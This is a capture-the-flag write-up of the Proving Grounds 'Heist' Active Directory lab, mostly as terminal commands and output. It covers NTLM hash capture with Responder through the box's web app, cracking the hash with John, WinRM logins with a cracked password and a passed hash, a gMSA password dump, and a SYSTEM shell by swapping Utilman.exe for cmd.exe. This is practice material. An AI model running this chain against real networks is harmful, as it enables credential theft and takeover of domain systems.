Heist — PG Practice(Write UP)

Rajesh Mondal
8 min readJan 4, 2024

--

Heist is an Active Directory Machine on proving grounds practice. The initial foothold was capturing NTLM credentials with the responder.

Nmap scan result of the Heist Server:

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ cat heist.nmap
# Nmap 7.92 scan initiated Wed Jan 3 18:59:48 2024 as: nmap -sC -sV -Pn -oN heist.nmap 192.168.153.165
Nmap scan report for 192.168.153.165
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-03 13:30:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2023-11-14T05:10:15
|_Not valid after: 2024-05-15T05:10:15
|_ssl-date: 2024-01-03T13:31:30+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: HEIST
| NetBIOS_Domain_Name: HEIST
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: heist.offsec
| DNS_Computer_Name: DC01.heist.offsec
| DNS_Tree_Name: heist.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2024-01-03T13:30:50+00:00
8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-title: Super Secure Web Browser
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-03T13:30:55
|_ start_date: N/A
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Wed Jan 3 19:01:36 2024 -- 1 IP address (1 host up) scanned in 107.70 seconds
  • Port 53/tcp: Running Simple DNS Plus.
  • Port 88/tcp: Microsoft Windows Kerberos for secure authentication.
  • Port 135/tcp: Microsoft Windows RPC service.
  • Ports 139/tcp and 445/tcp: Microsoft Windows NetBIOS and possibly Microsoft Directory Services.
  • Ports 389/tcp, 3268/tcp: Microsoft Windows Active Directory LDAP services.
  • Port 464/tcp: Potentially for kpasswd5, related to Kerberos.
  • Port 593/tcp: Microsoft Windows RPC over HTTP.
  • Port 636/tcp: Likely secured LDAP service (wrapped by TCP).
  • Port 3269/tcp: Similar to 636/tcp, secured LDAP service (wrapped).
  • Port 3389/tcp: Microsoft Terminal Services (RDP), with detailed SSL certificate information and RDP NTLM info, indicating the target is a Windows system, specifically ‘DC01’ in the ‘HEIST’ domain.
  • Port 8080/tcp: Running Werkzeug HTTP server version 2.0.1 with Python 3.9.0. It hosts a web application titled “Super Secure Web Browser”.

Added a records for heist.offsec and dc01.heist.offsec to /etc/hosts file

Opening Port 8080 on the web browser, Web Browser App.

Entering localhost in url field results an error page.

Then turning on python http.server on port 80 I visited the url on search url bar and the Directory structure got listed and I also got msg of visit in my http.server terminal.

Now If I turn on responder on my vpn tun0 and try to visit my ip using that. Let’s see what we get.

For my surprise I got NTLM hash of some user named enox.

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
           NBT-NS, LLMNR & MDNS Responder 3.1.3.0  To support this project:
Patreon -> <https://www.patreon.com/PythonResponder>
Paypal -> <https://paypal.me/PythonResponder>
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [192.168.45.203]
Responder IPv6 [fe80::f9ac:c1b0:1888:1951]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-3ZM4RQIJ3VA]
Responder Domain Name [5TLM.LOCAL]
Responder DCE-RPC Port [47726]
[+] Listening for events... [HTTP] NTLMv2 Client : 192.168.153.165
[HTTP] NTLMv2 Username : HEIST\\enox
[HTTP] NTLMv2 Hash : enox::HEIST:<REDUCTED>:<REDUCTED>:0101000000000000A8E0AA97553EDA0129F54E4AB943C6DE0000000002000800350054004C004D0001001E00570049004E002D0033005A004D0034005200510049004A0033005600410004001400350054004C004D002E004C004F00430041004C0003003400570049004E002D0033005A004D0034005200510049004A003300560041002E00350054004C004D002E004C004F00430041004C0005001400350054004C004D002E004C004F00430041004C0008003000300000000000000000000000003000002184FB7FA927C34729731C2A223CA1542BCB740A2C3C6CB8F29853E2F03C2D9C0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003200300033000000000000000000
[+] Exiting...

I saved the hash to enox.hash and tried with john to crack.

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ john enox.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
c********a (enox)
1g 0:00:00:00 DONE 2/3 (2024-01-03 20:40) 50.00g/s 477700p/s 477700c/s 477700C/s 123456..Peter
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

and I got the password within a blink.

Using this credential. I got access using evil-winrm

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ evil-winrm -u enox -p california -i 192.168.153.165

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\enox\\Documents> whoami
heist\\enox

Now if I search for txt files I found 2 files.

*Evil-WinRM* PS C:\\Users\\enox\\Documents> get-childitem -path C:\\Users\\ -include *.txt -file -recurse -erroraction silentlycontinue
    Directory: C:\\Users\\enox\\DesktopMode                LastWriteTime         Length Name
---- ------------- ------ ----
-a---- 1/3/2024 5:27 AM 34 local.txt
-a---- 5/27/2021 7:03 AM 239 todo.txt
*Evil-WinRM* PS C:\\Users\\enox\\Documents>

I got local flag using cat commaand

*Evil-WinRM* PS C:\\Users\\enox\\Documents> cat C:\\Users\\enox\\Desktop\\local.txt
9138c0caa8a81d2082df2f40891ed1a6
*Evil-WinRM* PS C:\\Users\\enox\\Documents> cat C:\\Users\\enox\\Desktop\\todo.txt
- Setup Flask Application for Secure Browser [DONE]
- Use group managed service account for apache [DONE]
- Migrate to apache
- Debug Flask Application [DONE]
- Remove Flask Application
- Submit IT Expenses file to admin. [DONE]

and got content of todo file.

Using net user /domain i found users on this domain.

*Evil-WinRM* PS C:\\Users\\enox\\Documents> net user /domain
User accounts for \\\\-------------------------------------------------------------------------------
Administrator enox Guest
krbtgt
The command completed with one or more errors.

We are on enox If we check group membership of enox we can see

*Evil-WinRM* PS C:\\Users\\enox\\Documents> net user enox /domain
User name enox
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set            8/31/2021 5:09:05 AM
Password expires Never
Password changeable 9/1/2021 5:09:05 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 11/14/2023 9:10:55 PM
Logon hours allowed AllLocal Group Memberships *Remote Management Use
Global Group memberships *Web Admins *Domain Users
The command completed successfully.

We can see enox is member of web admins.

Uploaded WinPeasx64.exe to target system.

*Evil-WinRM* PS C:\\Users\\enox\\Documents> upload winpeasx64.exe

Info: Uploading /home/kali/offsec/heist/winpeasx64.exe to C:\\Users\\enox\\Documents\\winpeasx64.exe

Data: 3183272 bytes of 3183272 bytes copied

Info: Upload successful!

using winpeas I found there is a service account which is svc_apache$

We also found on todo.txt file that

- Use group managed service account for apache [DONE]

So hopefully maybe this will be the hole to get Highest Privilege.

Running GMSAPasswordReader.exe with — acountname svc_apache

*Evil-WinRM* PS C:\\Users\\enox\\Documents> .\\gmsapasswordreader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : B8730DFF931E27DC2D3A77BBDA4B5253
[*] aes128_cts_hmac_sha1 : E4A2B58F686F64C56026456196555C32
[*] aes256_cts_hmac_sha1 : D2CF4C019A5EAC62F432AF99B230F9079658DC8A0071E4E2F11C1EF0FA257756
[*] des_cbc_md5 : 7CBFF2A41FC2D0D6
Calculating hashes for Current Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : 526C435B8E4CF11F447D6EF7152665BB
[*] aes128_cts_hmac_sha1 : 19565C12FDE19AD1033BA3BBD56DD230
[*] aes256_cts_hmac_sha1 : 43F6DECE6269A588687ACFF41F633A0F7AA9C3FBC7FEAB8BE6981854C19FE817
[*] des_cbc_md5 : 4AEA91DCEF918F29

I got rc4_hmac hash of svc_apache$ user which is same like nt hash, that means we can use this to login to evil-winrm.

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ evil-winrm -u svc_apache$ -H "526C435B8E4CF11F447D6EF7152665BB" -i 192.168.216.165

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\svc_apache$\\Documents> whoami
heist\\svc_apache$
*Evil-WinRM* PS C:\\Users\\svc_apache$\\Documents>

Now we have foot in service accounts.

If we check the privsec permission of the service account.

We can see that it has SeRestorePrivilege is enabled.

Searching with google on this I found

Reference: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

I found the Utilman.exe file using get-childitem cmdlet

*Evil-WinRM* PS C:\\Users\\svc_apache$\\Documents> get-childitem -path C:\\Windows\\System32\\ -include utilman.exe -file -recurse -erroraction silentlycontinue
    Directory: C:\\Windows\\System32Mode                LastWriteTime         Length Name
---- ------------- ------ ----
-a---- 5/28/2021 4:10 AM 113664 Utilman.exe

I moved the utilman.exe to utilman.old

*Evil-WinRM* PS C:\\Users\\svc_apache$\\Documents> mv C:\\Windows\\System32\\Utilman.exe C:\\Windows\\System32\\Utilman.old

Then I moved cmd.exe to Utilman.exe

*Evil-WinRM* PS C:\\Windows\\System32> mv cmd.exe Utilman.exe

Opened the rdp session using rdesktop

Now I pressed win+u key and the cmd prompt appeared

I found I have cmd now as NT Authority\System

from Administrator’s Desktop I found proof flag.

--

--